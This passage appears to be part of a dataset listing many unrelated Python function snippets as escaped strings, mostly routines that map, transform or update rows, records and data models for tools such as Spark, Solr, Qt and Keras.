'region_code': row[REGION_CODE_COLUMN],\n 'country_code': row[COUNTRY_CODE_COLUMN],\n 'continent_code': continent_code,\n 'min_ip_hex': hex_encode_ip(ips[0]) if ips else None,\n 'max_ip_hex': hex_encode_ip(ips[-1]) if ips else None,\n 'transit_provider': row[TRANSIT_PROVIDER],\n 'min_ip': str(ips[0]) if ips else None,\n 'max_ip': str(ips[-1]) if ips else None,\n 'ip_prefix': normalize_ip(row[IP_PREFIX_COLUMN]),\n 'min_ipv6_hex': hex_encode_ip(ipv6_ips[0]) if ipv6_ips else None,\n 'max_ipv6_hex': hex_encode_ip(ipv6_ips[-1]) if ipv6_ips else None,\n 'min_ipv6': str(ipv6_ips[0]) if ipv6_ips else None,\n 'max_ipv6': str(ipv6_ips[-1]) if ipv6_ips else None,\n 'ipv6_prefix': normalize_ip(row[IPV6_PREFIX_COLUMN]),\n }\n\n return row", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def map():", "def _map_model_dict(self, model_dict, parallel_dict):\n\n # Loop over the model_dict.\n for model_key, item_dict in model_dict.items():\n\n # Get the item type.\n item_type = self._get_item_type(item_dict)\n\n # If it's an object, use the object function.\n if item_type == 'object':\n self._add_object_to_map(model_key, item_dict)\n\n elif item_type == 'clock':\n self._add_clock_to_map(model_key, item_dict)\n\n elif item_type == 'module':\n # Map by module name.\n self._add_module_to_map(model_key, item_dict)\n\n elif item_type == 'omftype':\n # Map (only if it's a module)\n if item_dict['omftype'] == 'module':\n self._add_module_to_map(model_key, item_dict)\n\n elif item_type == 'class':\n # Map the class.\n self._add_class_to_map(model_key, item_dict)\n\n elif item_type in self.NO_MAP:\n # No mapping for now.\n pass\n\n else:\n # Unexpected type, raise warning.\n raise ValueError('Unimplemented item: {}'.format(item_dict))\n\n # If the item's dictionary contains a numeric key mapped to\n # a dictionary, we have a nested item which should be\n # mapped. This will be done recursively.\n to_pop = []\n to_add = []\n for k, v in item_dict.items():\n if isinstance(k, int):\n if isinstance(v, dict):\n # If we have 'omfEmbeddedConfigObject' we have\n # a nested configuration which needs special\n # handling.\n try:\n s = v['omfEmbeddedConfigObject'].split()\n except KeyError:\n # No extra work to do here. Mark that we'll\n # use the 'parent' key.\n parent = True\n else:\n # We do have an omfEmbeddedConfigObject.\n assert len(s) == 3, (\"Don't know how to handle \"\n \"embedded config objects \"\n \"like this: {}\"\n .format(v))\n\n # Not using 'parent' in this case.\n parent = False\n\n # Attempt to get the name of the object up\n # in the hierarchy.\n try:\n name = v['name']\n except KeyError:\n # This object doesn't have a name, but\n # needs one since we're going to un-nest\n # it.\n try:\n prefix = item_dict['name']\n except KeyError:\n # No name to use, make it random.\n prefix = _gen_rand_name(n=10)\n\n # Create a name based on the type of object\n # we're nesting. Example:\n # s = ['conductor_1', 'object',\n # 'triplex_line_conductor']\n # So we're grabbing \"conductor_1\".\n name = prefix + '_' + s[0]\n\n # Add the name.\n v['name'] = name\n\n # Mark this as \"to add\" later (don't modify\n # objects we're looping over)\n to_add.append((s[0], name))\n\n # Remove the 'omfEmbeddedConfigObject'\n # notation.\n del v['omfEmbeddedConfigObject']\n # Add the object definition.\n v[s[1]] = s[2]\n\n # Recurse.\n parallel_dict = \\\n self._map_model_dict(model_dict={k: v},\n parallel_dict=parallel_dict)\n\n # Mark that we need to pop this (can't pop\n # while looping over the dict)\n to_pop.append((k, parent))\n else:\n m = ('The model_dict has a numeric key that does not '\n + 'map to a dictionary!')\n raise TypeError(m)\n\n # Remove nested objects, move to top-level.\n for t in to_pop:\n k = t[0]\n parent = t[1]\n\n # Pop the object, and add the 'parent' property if\n # applicable.\n nested_item = item_dict.pop(k)\n if parent:\n try:\n nested_item['parent'] = item_dict['name']\n except KeyError:\n m = ('Nested item was nested within another item '\n + 'that does not have a name!')\n raise KeyError(m)\n\n # Put item in the parallel dictionary.\n parallel_dict[k] = nested_item\n\n # Add properties that were necessary due to our \"un-nesting\"\n for t in to_add:\n # t is a tuple like (key, value)\n item_dict[t[0]] = t[1]\n\n # Return the parallel dictionary.\n return parallel_dict", "def apply(self, transform_func):\n #input_shapes = transform_func.input_shapes\n #input_types = transform_func.input_types\n #data_shapes = transform_func.data_shapes\n #data_types = transform_func.data_types\n #assert input_shapes == self._data_shapes\n #assert input_types = self._data_types\n ret_gen = transform_func(self.generator)\n ret = type(self).from_generator_func(ret_gen)\n if self.name is not None:\n ret.name = self.name\n #ret.data_shapes = data_shapes\n #ret.data_types = data_types\n return ret", "def transform(self, data: pd.DataFrame):\n raise NotImplementedError", "def parse_csv_row(self, row):\n\n for key in self.field_map:\n if self.field_map[key] is not None:\n if key == 'marking':\n self.obstacle_data[key] = self.get_marking_value(row[self.field_map[key]].strip())\n elif key == 'lighting':\n self.obstacle_data[key] = self.get_lighting_value(row[self.field_map[key]].strip())\n elif key == 'obst_type':\n self.obstacle_data['obst_type_id'] = self.get_obstacle_type_id(row[self.field_map[key]].strip())\n else:\n self.obstacle_data[key] = row[self.field_map[key]].strip()", "def _createModelFromData(self, data):\n model = QStandardItemModel()\n model.setRowCount(len(data))\n model.setColumnCount(1)#model.setColumnCount(len(data[0]))\n # set model role names\n start_role = Qt.UserRole + 1\n role_names = {}\n for key, _ in data[0].items():\n column_index = list(data[0].keys()).index(key)\n role = start_role + column_index\n role_names[role] = key.encode()\n model.setItemRoleNames(role_names)\n # set model data\n for row_index, row_dict in enumerate(data):\n for key, value in row_dict.items():\n column_index = list(row_dict.keys()).index(key)\n index = model.index(row_index, 0)\n role = start_role + column_index\n model.setData(index, value, role)\n return model", "def _setMatrixRow(self, row):\n item = self._item()\n if item is not None:\n matrix = item.getMatrix()\n matrix[self._index, :] = row.x(), row.y(), row.z()\n item.setMatrix(matrix)", "def transform(self, results: Dict) -> Dict:\n\n # Apply mapping\n inputs = self._map_input(results, self.mapping)\n # Apply wrapped transforms\n outputs = self._apply_transforms(inputs)\n # Apply remapping\n outputs = self._map_output(outputs, self.remapping)\n\n results.update(outputs) # type: ignore\n return results", "def _transform_row_model(\n rowkey: str, row: dict, sep: str\n) -> models.RowModelOdd:\n keys = [\"sid\", \"lid\", \"mid\", \"mkt\", \"seq\", \"per\", \"vendor\", \"ts\"]\n info_list: list = [\"s\", \"per\", \"et\"]\n\n row_dict = dict(zip(keys, rowkey.split(sep)))\n row_dict[\"info\"] = {}\n row_dict[\"odds\"] = {}\n row_model = models.RowModelOdd(**row_dict)\n \n info_dict: dict = {}\n for col in info_list:\n col_name = \":\".join([\"info\", col])\n info_dict[col] = row[col_name.encode(\"utf-8\")]\n row_model.info = models.OddInfoModel(**info_dict)\n\n target_cols = _get_target_column_list(row_model.mkt)\n odds_dict: dict = {}\n for col in target_cols:\n col_name = \":\".join([\"odds\", col])\n odds_dict[col] = row[col_name.encode(\"utf-8\")]\n\n odd_model = None\n mkt: str = row_model.mkt\n if mkt.startswith(\"1x2\"):\n odd_model = models.ColumnModel1x2(**odds_dict)\n elif mkt.startswith(\"ah\"):\n odd_model = models.ColumnModelAH(**odds_dict)\n else:\n odd_model = models.ColumnModelOU(**odds_dict)\n\n row_model.odds = odd_model\n\n return row_model", "def apply(self):\n\n sc = SparkContext(appName=\"Model Applier\")\n sqlContext = SQLContext(sc)\n\n # Add model and supporting files to SparkContext\n for item in self.model_location_dict.items():\n ModelApplier.add_files_to_context(item[1], sc)\n\n partition_processor = self.get_partition_processor()\n infile = sc.textFile(self.input_location)\n header_line = infile.first()\n infile = infile.filter(lambda x: x != header_line)\n\n result = infile.mapPartitions(partition_processor).flatMap(lambda x: x)\n print('result.class', result.__class__)\n\n result = result.map(lambda (x, a, y, segment, model_version):\n (int(x), float(a), float(y), segment, model_version))\n sqlContext.createDataFrame(result).saveAsParquetFile(self.output_location)", "def run(self, row, **kwargs):\n self.source = row\n kwargs['output'] = self.__graph__()\n super(CSVRowProcessor, self).run(**kwargs)\n return kwargs['output']", "def _apply_transform(self):\n pass", "def _set_mapper(self, classification_dict):\n d = {class_code: class_index for class_index, class_code in enumerate(classification_dict.keys())}\n # Here we update the dict so that code 65 remains unchanged.\n # Indeed, 65 is reserved for noise/artefacts points, that will be deleted by transform \"DropPointsByClass\".\n d.update({65: 65})\n self.mapper = np.vectorize(lambda class_code: d.get(class_code))", "def load_initial_nl_mapping(matrix: list):\n print(\"Start loading...\")\n\n # delete existed objects\n # models.NominalLabelMapping.objects.all().delete()\n\n for row in matrix[1:]:\n book = row[0].strip()\n plant_code = row[1].strip()\n model = row[2].strip()\n value = row[3]\n\n match_object = models.NominalLabelMapping.objects.filter(\n model=model,\n value=value).first()\n if not match_object:\n match_object = models.NominalLabelMapping(\n model=model,\n value=value\n )\n setattr(match_object, 'book', book)\n setattr(match_object, 'plant_code', plant_code) \n # save models\n match_object.save()", "def apply_model_to_query(self, query):\n pass", "def update(self, data: Mapping[str, np.ndarray]) -> Self:\n\n raise NotImplementedError", "def feedDataRow(self, row, **kwargs): \n\n self.nullify()\n \n #avoid automatic call to \"read\" after _objectid changes \n self._feed = True\n self._objectid = row['objectid']\n self._feed = False\n \n self._original_values.clear()\n for cn in row:\n if cn in self._extra_sql_columns:\n self.__dict__[cn] = row[cn]\n if cn not in self._table: continue\n field = self._table[cn]\n decoded = field.val_sql2py ( row[cn] )\n self.__dict__[cn] = decoded\n self._original_values[cn] = decoded\n \n #if _astxt was not provided with the data, _reprfunc is not set,\n #get the text from database\n if '_astxt' in row:\n self._astxt = row['_astxt']\n elif self._reprfunc:\n self._astxt = self._reprfunc (self)\n else: \n self._astxt = self.TextCache[self._objectid] or \"(none)\"\n \n if self._resolve_child_ref:\n for child_handle in self._child_referencelist:\n t, f = self._table.reference_child_hash[child_handle] \n self._child_referencelist[child_handle].filter = f.name + \" = '\" + str(row['objectid']) + \"'\"\n self._child_referencelist[child_handle].reload()\n \n self._hasdata = True\n self._isnew = False\n self._ismodified = False\n self._modified_values.clear()", "def _transform(self, dataset):\n raise NotImplementedError()", "def _convert_row(self, row) :\n\n self.row_id += 1\n data = [self.row_id]\n\n if type(row) == type({}) :\n data.extend(row.get(col, None) for col in self.cols[1:])\n elif type(row) in [type([]), type(())] :\n data.extend(row)\n elif type(row) == RowReference :\n data.extend(row.values())\n else :\n raise Exception(\n 'Don''t know how to add row from: %s ' % str(row)\n )\n\n if len(data) != len(self.cols) :\n raise Exception(\n 'Wrong number of values for new row with cols %s: %s' % \n (str(self.cols), str(data))\n \n )\n\n return data", "def transform(self, X):\n\n X = super().transform(X)\n\n X[self.columns] = self.value\n\n return X", "def transform(self, data, attr):\n data['point'] = torch.from_numpy(data['point'])\n data['feat'] = torch.from_numpy(data['feat'])\n data['label'] = torch.from_numpy(data['label'])\n\n return data", "def update_old_row(self, data):\n for key, value in data.items():\n _column = self._labels.index([v['display'] for k, v in self.headers.items() if k == key].pop())\n cell = self.item(self._opt_row, _column)\n _cell_data = cell.get_data()\n _cell_data[key] = value\n\n cell.set_content(value, _cell_data)", "def map(self, function):\n pass", "def mapdata():\n return getmapdata(db, MyTable)", "def mapping_runner(self):\n if not isinstance(self.model_source, str):\n raise ValueError(\"Tried to initialize mapping without a model\")\n \n import keras\n sys.stdout.flush()\n keras.backend.clear_session()\n sys.stdout.flush()\n \n # Load model and normalization parameters\n print(\"Loading model\", self.model_source)\n model = keras.models.load_model(self.model_source)\n x_mean_std = [np.load(self.model_source + \"_x_mean.npy\"), np.load(self.model_source + \"_x_std.npy\")]\n y_mean_std = [np.load(self.model_source + \"_y_mean.npy\"), np.load(self.model_source + \"_y_std.npy\")]\n \n while self.run_map.value:\n sample = self.feat_in_pipe_out.recv()\n \n # Reload if needed\n if self.auto_reload == True and self.observer.check_change():\n model = keras.models.load_model(self.model_source)\n \n # Normalize\n sample = (sample - x_mean_std[0]) / x_mean_std[1]\n \n # Map\n result_sample = model.predict(sample, batch_size = 1)\n\n # Denormalize\n if self.denorm_out:\n result_sample = (result_sample * y_mean_std[1]) + y_mean_std[0]\n \n self.output_data(result_sample)\n \n sys.stdout.flush()\n keras.backend.clear_session()\n sys.stdout.flush()", "def _transform_data(self, *args, **kwargs) -> None:\n raise NotImplementedError", "def map_record(row: DLCSRecord, solr_client: Solr, config: typing.Dict) -> UrsusRecord: # pylint: disable=too-many-statements\n record: UrsusRecord = {\n field_name: map_field_value(row, field_name, config=config)\n for field_name in mapper.FIELD_MAPPING\n }\n\n # THUMBNAIL\n record[\"thumbnail_url_ss\"] = (\n record.get(\"thumbnail_url_ss\")\n or thumbnail_from_child(record, config=config)\n or thumbnail_from_manifest(record)\n )\n\n # COLLECTION NAME\n if \"Parent ARK\" in row and row[\"Parent ARK\"] in config[\"collection_names\"]:\n dlcs_collection_name = config[\"collection_names\"][row[\"Parent ARK\"]]\n record[\"dlcs_collection_name_tesim\"] = [dlcs_collection_name]\n\n # FIELDS\n record[\"uniform_title_sim\"] = record.get(\"uniform_title_tesim\")\n record[\"architect_sim\"] = record.get(\"architect_tesim\")\n record[\"author_sim\"] = record.get(\"author_tesim\")\n record[\"illuminator_sim\"] = record.get(\"illuminator_tesim\")\n record[\"scribe_sim\"] = record.get(\"scribe_tesim\")\n record[\"rubricator_sim\"] = record.get(\"rubricator_tesim\")\n record[\"commentator_sim\"] = record.get(\"commentator_tesim\")\n record[\"translator_sim\"] = record.get(\"translator_tesim\")\n record[\"lyricist_sim\"] = record.get(\"lyricist_tesim\")\n record[\"composer_sim\"] = record.get(\"composer_tesim\")\n record[\"illustrator_sim\"] = record.get(\"illustrator_tesim\")\n record[\"editor_sim\"] = record.get(\"editor_tesim\")\n record[\"calligrapher_sim\"] = record.get(\"calligrapher_tesim\")\n record[\"engraver_sim\"] = record.get(\"engraver_tesim\")\n record[\"printmaker_sim\"] = record.get(\"printmaker_tesim\")\n record[\"human_readable_language_sim\"] = record.get(\"human_readable_language_tesim\")\n record[\"names_sim\"] = name_fields(record)\n record[\"keywords_sim\"] = keywords_fields(record)\n record[\"collection_sim\"] = record.get(\"collection_ssi\")\n # explicit\n record[\"features_sim\"] = record.get(\"features_tesim\")\n # incipit\n # inscription\n record[\"script_sim\"] = record.get(\"script_tesim\")\n record[\"writing_system_sim\"] = record.get(\"writing_system_tesim\")\n record[\"year_isim\"] = year_parser.integer_years(record.get(\"normalized_date_tesim\"))\n record[\"date_dtsim\"] = solr_transformed_dates(solr_client,\n (date_parser.get_dates(record.get(\"normalized_date_tesim\"))))\n record[\"place_of_origin_sim\"] = record.get(\"place_of_origin_tesim\")\n record[\"associated_name_sim\"] = record.get(\"associated_name_tesim\")\n record[\"form_sim\"] = record.get(\"form_tesim\")\n record[\"support_sim\"] = record.get(\"support_tesim\")\n record[\"genre_sim\"] = record.get(\"genre_tesim\")\n record[\"subject_sim\"] = record.get(\"subject_tesim\")\n record[\"location_sim\"] = record.get(\"location_tesim\")\n record[\"named_subject_sim\"] = record.get(\"named_subject_tesim\")\n record[\"human_readable_resource_type_sim\"] = record.get(\"resource_type_tesim\")\n record[\"member_of_collections_ssim\"] = record.get(\"dlcs_collection_name_tesim\")\n\n # SINAI INDEX\n record[\"header_index_tesim\"] = header_fields(record)\n record[\"name_fields_index_tesim\"] = name_fields_index(record)\n\n # SORT FIELDS\n titles = record.get(\"title_tesim\")\n if isinstance(titles, typing.Sequence) and len(titles) >= 1:\n record[\"sort_title_ssort\"] = titles[0]\n\n # used a solr copyfield for shelfmark sorting\n # shelfmarks = record.get(\"shelfmark_ssi\")\n # print(shelfmarks)\n # if isinstance(shelfmarks, typing.Sequence) and len(shelfmarks) >= 1:\n # print(shelfmarks[0])\n # record[\"shelfmark_aplha_numeric_ssort\"] = shelfmarks[0]\n\n# -----------------------------------------------------------------------\n years = record.get(\"year_isim\")\n if isinstance(years, typing.Sequence) and len(years) >= 1:\n record[\"sort_year_isi\"] = min(years)\n\n dates = record.get(\"date_dtsim\")\n if isinstance(dates, typing.Sequence) and len(dates) >= 1:\n record[\"date_dtsort\"] = dates[0]\n return record", "def mapRow(row):\n commentsRow = row.comments\n captionRow = row.caption\n comments = commentsRow.data # select comments\n textComments = \" \".join([x.text for x in comments]) # remove metadata from comments\n if hasattr(captionRow, \"edges\"):\n captions = captionRow.edges\n textCaptions = \" \".join([x.node.text for x in captions])\n if hasattr(captionRow, \"text\"):\n textCaptions = captionRow.text\n if not row.tags is None:\n tags = \" \".join([x for x in row.tags])\n else:\n tags = \"\"\n textComments = textComments.replace(\"\\n\", \" \")\n textComments = textComments.replace(\"\\t\", \" \")\n textComments = textComments.replace(\",\", \" \")\n textCaptions = textCaptions.replace(\"\\n\", \" \")\n textCaptions = textCaptions.replace(\"\\t\", \" \")\n textCaptions = textCaptions.replace(\",\", \" \")\n tags = tags.replace(\"\\n\", \" \")\n tags = tags.replace(\"\\t\", \" \")\n tags = tags.replace(\",\", \" \")\n if len(row.urls) > 0:\n url = row.urls[0]\n else:\n url = \"missing-url\"\n id = row.id\n return pyspark.sql.Row(comments=textComments, caption=textCaptions, tags=tags, id=id, url=url)", "def apply(self, data):\n print(\"this is morphism '{}'\".format(self.name))\n data = np.array(data)\n transformed_data = self.transf(data)\n return pd.DataFrame.from_dict({\"transf\": transformed_data.flatten()})", "def _map_fn(self):\n raise NotImplementedError", "def populate_instance(self, mapper, selectcontext, row, instance, **flags):\n instance.TEST = \"hello world\"\n return EXT_CONTINUE", "def _get_map_record(self):\n return self.mapper.map_record(self.binding_record)", "def mapping(self, mapping):\n self.set_mapping(mapping)", "def run_mapper():\n print(blue + \"\\n>>> \" + reset + \"Executing the model mapper...\")\n\n cmdb_ci_types = cmdb_data_model.cmdb_data_model.get(\"ci_types\")\n cmdb_rel_types = cmdb_data_model.cmdb_data_model.get(\"rel_types\")\n cmdb_ci_attributes = cmdb_data_model.cmdb_data_model.get(\"ci_attributes\")\n cmdb_rel_attributes = cmdb_data_model.cmdb_data_model.get(\"rel_attributes\")\n\n db_ci_types = db_data_model.db_data_model.get(\"ci_types\")\n db_rel_types = db_data_model.db_data_model.get(\"rel_types\")\n db_ci_attributes = db_data_model.db_data_model.get(\"ci_attributes\")\n db_rel_attributes = db_data_model.db_data_model.get(\"rel_attributes\")\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating configuration item types similarity...\")\n ci_similarity = calculate_class_similarity(cmdb_ci_types, db_ci_types)\n\n new_ci_similarity = {}\n for key in ci_similarity:\n new_ci_similarity[key] = {k: v for k, v in sorted(\n ci_similarity.get(key).items(), key=lambda item: item[1], reverse=True)}\n order = {}\n for key in new_ci_similarity:\n if len(new_ci_similarity.get(key)) > 0:\n order[key] = new_ci_similarity.get(key).get(\n list(new_ci_similarity.get(key).keys())[0])\n order = {k: v for k, v in sorted(\n order.items(), key=lambda item: item[1], reverse=True)}\n ci_similarity = {}\n for key in order:\n ci_similarity[key] = new_ci_similarity.get(key)\n\n similar_ci = select_most_similar(ci_similarity, {}, [])\n new_similar_ci = {}\n for key in similar_ci:\n if len(similar_ci.get(key)) > 0:\n new_similar_ci[key] = similar_ci.get(key)\n similar_ci = new_similar_ci\n\n print(blue + \"\\n>>> \" + reset + \"Calculating relationship types similarity...\")\n rel_similarity = calculate_class_similarity(cmdb_rel_types, db_rel_types)\n\n new_rel_similarity = {}\n for key in rel_similarity:\n new_rel_similarity[key] = {k: v for k, v in sorted(\n rel_similarity.get(key).items(), key=lambda item: item[1], reverse=True)}\n order = {}\n for key in new_rel_similarity:\n if len(new_rel_similarity.get(key)) > 0:\n order[key] = new_rel_similarity.get(key).get(\n list(new_rel_similarity.get(key).keys())[0])\n order = {k: v for k, v in sorted(\n order.items(), key=lambda item: item[1], reverse=True)}\n rel_similarity = {}\n for key in order:\n rel_similarity[key] = new_rel_similarity.get(key)\n\n similar_rel = select_most_similar(rel_similarity, {}, [])\n new_similar_rel = {}\n for key in similar_rel:\n if len(similar_rel.get(key)) > 0:\n new_similar_rel[key] = similar_rel.get(key)\n similar_rel = new_similar_rel\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating configuration item attributes similarity...\")\n attr_ci_similarity = calculate_attribute_similarity(\n similar_ci, cmdb_ci_attributes, db_ci_attributes)\n\n new_attr_ci_similarity = {}\n for cmdb_t in attr_ci_similarity:\n new_attr_ci_similarity[cmdb_t] = {}\n for key in attr_ci_similarity.get(cmdb_t):\n new_attr_ci_similarity[cmdb_t][key] = {k: v for k, v in sorted(\n attr_ci_similarity.get(cmdb_t).get(key).items(), key=lambda item: item[1], reverse=True)}\n\n order = {}\n for cmdb_t in new_attr_ci_similarity:\n order[cmdb_t] = {}\n for key in new_attr_ci_similarity.get(cmdb_t):\n if len(new_attr_ci_similarity.get(cmdb_t).get(key)) > 0:\n order[cmdb_t][key] = new_attr_ci_similarity.get(cmdb_t).get(key).get(\n list(new_attr_ci_similarity.get(cmdb_t).get(key).keys())[0])\n for o in order:\n order[o] = {k: v for k, v in sorted(\n order.get(o).items(), key=lambda item: item[1], reverse=True)}\n\n attr_ci_similarity = {}\n for o in order:\n attr_ci_similarity[o] = {}\n for key in order.get(o):\n attr_ci_similarity[o][key] = new_attr_ci_similarity.get(o).get(key)\n\n similar_attr_ci = {x: select_most_similar(\n attr_ci_similarity.get(x), {}, []) for x in attr_ci_similarity}\n\n new_similar_attr_ci = {}\n for key in similar_attr_ci:\n if len(similar_attr_ci.get(key)) > 0:\n new_similar_attr_ci[key] = similar_attr_ci.get(key)\n similar_attr_ci = new_similar_attr_ci\n\n print(blue + \"\\n>>> \" + reset +\n \"Calculating relationship attributes similarity...\")\n attr_rel_similarity = calculate_attribute_similarity(\n similar_rel, cmdb_rel_attributes, db_rel_attributes)\n\n new_attr_rel_similarity = {}\n for cmdb_t in attr_rel_similarity:\n new_attr_rel_similarity[cmdb_t] = {}\n for key in attr_rel_similarity.get(cmdb_t):\n new_attr_rel_similarity[cmdb_t][key] = {k: v for k, v in sorted(\n attr_rel_similarity.get(cmdb_t).get(key).items(), key=lambda item: item[1], reverse=True)}\n\n order = {}\n for cmdb_t in new_attr_rel_similarity:\n order[cmdb_t] = {}\n for key in new_attr_rel_similarity.get(cmdb_t):\n if len(new_attr_rel_similarity.get(cmdb_t).get(key)) > 0:\n order[cmdb_t][key] = new_attr_rel_similarity.get(cmdb_t).get(key).get(\n list(new_attr_rel_similarity.get(cmdb_t).get(key).keys())[0])\n for o in order:\n order[o] = {k: v for k, v in sorted(\n order.get(o).items(), key=lambda item: item[1], reverse=True)}\n\n attr_rel_similarity = {}\n for o in order:\n attr_rel_similarity[o] = {}\n for key in order.get(o):\n attr_rel_similarity[o][key] = new_attr_rel_similarity.get(\n o).get(key)\n\n similar_attr_rel = {x: select_most_similar(\n attr_rel_similarity.get(x), {}, []) for x in attr_rel_similarity}\n\n new_similar_attr_rel = {}\n for key in similar_attr_rel:\n if len(similar_attr_rel.get(key)) > 0:\n new_similar_attr_rel[key] = similar_attr_rel.get(key)\n similar_attr_rel = new_similar_attr_rel\n\n present_map(cmdb_ci_types, db_ci_types, cmdb_rel_types, db_rel_types, cmdb_ci_attributes, db_ci_attributes, cmdb_rel_attributes, db_rel_attributes, similar_ci, similar_rel,\n similar_attr_ci, similar_attr_rel)\n\n threshold = ask_for_threshold()\n\n define_rules(float(threshold), similar_ci, similar_rel,\n similar_attr_ci, similar_attr_rel)", "def cell_map_from_database(self) -> None:\n for row in self.session.query(DatamapItem).all():\n self.cell_map.append(\n Cell(\n datamap_id=row.id,\n cell_key=row.key,\n cell_value=None,\n template_sheet=row.bicc_sheet,\n bg_colour=None,\n fg_colour=None,\n number_format=None,\n verification_list=None,\n cell_reference=row.bicc_cellref))", "def update_row(self, pk, row_dict):\n return self.execute(self.commands.update_row(\n self.name,\n col_val=self._join_equality(row_dict),\n pk_col=self.primary_key_column,\n pk=pk\n ))", "def iter_rows(self, *args):\n\n raw_args = []\n for arg in args:\n if arg in self._column_translations:\n raw_args+=self._column_translations[arg].inputs()\n else:\n raw_args.append(arg)\n for raw_values in self.iter_rows_raw(*raw_args):\n values = [raw_values[0], raw_values[1]]\n for arg in args:\n if arg in self._column_translations:\n values.append(self._column_translations[arg](raw_args, raw_values[2:]))\n else:\n values.append(raw_values[2:][raw_args.index(arg)])\n yield values", "def map(self, function):\n return FunctionalWrapper(map(function, self.data))", "def to_dask_input_data(self, *data: List[Row]) -> Dict[str, List[Any]]:\n\n if not len(data) == len(self.input_keys):\n logger.warning(\n \"%s expected %s input keys, received %s\",\n self,\n len(self.input_keys),\n len(data),\n )\n\n output: Dict[str, List[Any]] = {}\n for i, rowset in enumerate(data):\n collection_address = self.input_keys[i]\n field_mappings = self.incoming_field_map[collection_address]\n\n for row in rowset:\n for foreign_field, local_field in field_mappings:\n append(output, local_field, row.get(foreign_field))\n\n return output", "def _map_raw_data_to_standard(self):\n data_df = self._raw_data.copy()\n\n # if only 1 RT col, split into 2\n if self._map_cols['goRT'] == self._map_cols['stopRT']:\n data_df[self._standards['columns']['goRT']] = np.where(\n data_df[self._map_cols['condition']] == self._map_codes['go'],\n data_df[self._map_cols['goRT']],\n None)\n data_df[self._standards['columns']['stopRT']] = np.where(\n data_df[self._map_cols['condition']] ==\n self._map_codes['stop'],\n data_df[self._map_cols['stopRT']],\n None)\n del data_df[self._map_cols['goRT']]\n else:\n data_df.loc[\n data_df[self._map_cols['condition']] !=\n self._map_codes['go'],\n self._map_cols['goRT']] = None\n data_df.loc[\n data_df[self._map_cols['condition']] !=\n self._map_codes['stop'],\n self._map_cols['stopRT']] = None\n\n # drop SSDs of non-stop Trials\n data_df.loc[\n data_df[self._map_cols['condition']] != self._map_codes['stop'],\n self._map_cols['SSD']] = None\n\n # add block column if not present\n if self._map_cols['block'] not in data_df.columns:\n data_df[self._map_cols['block']] = 1\n\n # recompute choice accuracy if missing / flagged\n if (self._map_cols['choice_accuracy'] not in self._raw_data.columns) |\\\n self._compute_acc_col:\n corr_code = self._map_codes['correct']\n incorr_code = self._map_codes['incorrect']\n data_df[self._map_cols['choice_accuracy']] = np.where(\n data_df[self._map_cols['response']] == data_df[\n self._map_cols['correct_response']],\n corr_code,\n incorr_code)\n\n # map columns, key codes to standard\n rename_column_dict = {self._map_cols[col]: self._standards['columns']\n [col] for col in self._map_cols.keys()}\n data_df = data_df.rename(columns=rename_column_dict)\n\n # map key codes to various columns\n condition_map = {\n self._map_codes['go']: self._standards['key_codes']['go'],\n self._map_codes['stop']: self._standards['key_codes']['stop'],\n }\n acc_map = {\n self._map_codes['correct']: self._standards['key_codes']['correct'],\n self._map_codes['incorrect']: self._standards['key_codes']['incorrect'],\n }\n no_response_map = {\n self._map_codes['noResponse']: self._standards['key_codes']['noResponse']\n }\n cols_n_maps = [(self._standards['columns']['condition'], condition_map),\n (self._standards['columns']['choice_accuracy'], acc_map),\n (self._standards['columns']['goRT'], no_response_map),\n (self._standards['columns']['stopRT'], no_response_map)]\n for col, map_dict in cols_n_maps:\n data_df[col] = data_df[col].map(lambda x: map_dict.get(x,x))\n\n assert self._is_preprocessed(data_df)\n self._transformed_data = data_df", "def update_row(self, rowIndex=0, shape=None, *args, **attributes):\n # check if there is a shape edit, if not skip and do attribute update\n if shape:\n if not isinstance(shape, shapefile.shapefile._Shape):\n self.shapes[rowIndex].points = shape\n else:\n self.shapes[rowIndex] = shape\n\n if attributes:\n for f_name, f_value in attributes.iteritems():\n f_index = self.field_indices[f_name]\n if f_index >= len(self.records[rowIndex]):\n self.records[rowIndex].append(f_value)\n else:\n self.records[rowIndex][f_index] = f_value\n\n self.__isBuilt = False", "def _map_input(self, data: Dict,\n mapping: Optional[Dict]) -> Dict[str, Any]:\n\n if mapping is None:\n return data.copy()\n\n def _map(data, m):\n if isinstance(m, dict):\n # m is a dict {inner_key:outer_key, ...}\n return {k_in: _map(data, k_out) for k_in, k_out in m.items()}\n if isinstance(m, (tuple, list)):\n # m is a list or tuple [outer_key1, outer_key2, ...]\n # This is the case when we collect items from the original\n # data to form a list or tuple to feed to the wrapped\n # transforms.\n return m.__class__(_map(data, e) for e in m)\n\n # allow manually mark a key to be ignored by ...\n if m is ...:\n return IgnoreKey\n\n # m is an outer_key\n if self.allow_nonexist_keys:\n return data.get(m, IgnoreKey)\n else:\n return data.get(m)\n\n collected = _map(data, mapping)\n\n # Retain unmapped items\n inputs = data.copy()\n inputs.update(collected)\n\n return inputs", "def from_mapping(cls, mapping, **kwargs):\n row = mapping['row'].values\n col = mapping['col'].values\n n_rows = mapping.metadata['n_rows']\n n_cols = mapping.metadata['n_columns']\n image = cls(row, col, n_rows, n_cols, **kwargs)\n image._mapping = mapping\n return image", "def _get_mapper_0(model):\n # build the maps\n eids_all = (\n list(model.elements.keys()) +\n list(model.masses.keys()) +\n list(model.rigid_elements.keys())\n )\n eid_map = {eid : eid for eid in eids_all}\n nid_map = {nid : nid for nid in model.point_ids}\n cid_map = {cid : cid for cid in model.coord_ids}\n mid_map = {mid : mid for mid in model.material_ids}\n spc_map = _dicts_key_to_key((model.spcs, model.spcadds))\n mpc_map = _dicts_key_to_key((model.mpcs, model.mpcadds))\n method_map = _dict_key_to_key(model.methods)\n properties_map = _dict_key_to_key(model.properties)\n rigid_elements_map = _dict_key_to_key(model.rigid_elements)\n cmethod_map = _dict_key_to_key(model.cMethods)\n flfact_map = _dict_key_to_key(model.flfacts)\n flutter_map = _dict_key_to_key(model.flutters)\n caero_map = _dict_key_to_key(model.caeros)\n freq_map = _dict_key_to_key(model.frequencies)\n\n dload_map = _dicts_key_to_key((model.dload_entries, model.dloads))\n load_map = _dicts_key_to_key((model.loads, model.load_combinations))\n lseq_map = load_map # wrong???\n temp_map = load_map # wrong???\n\n tstep_map = _dict_key_to_key(model.tsteps)\n tstepnl_map = _dict_key_to_key(model.tstepnls)\n suport1_map = _dict_key_to_key(model.suport1)\n #suport_map = {}\n\n nlparm_map = 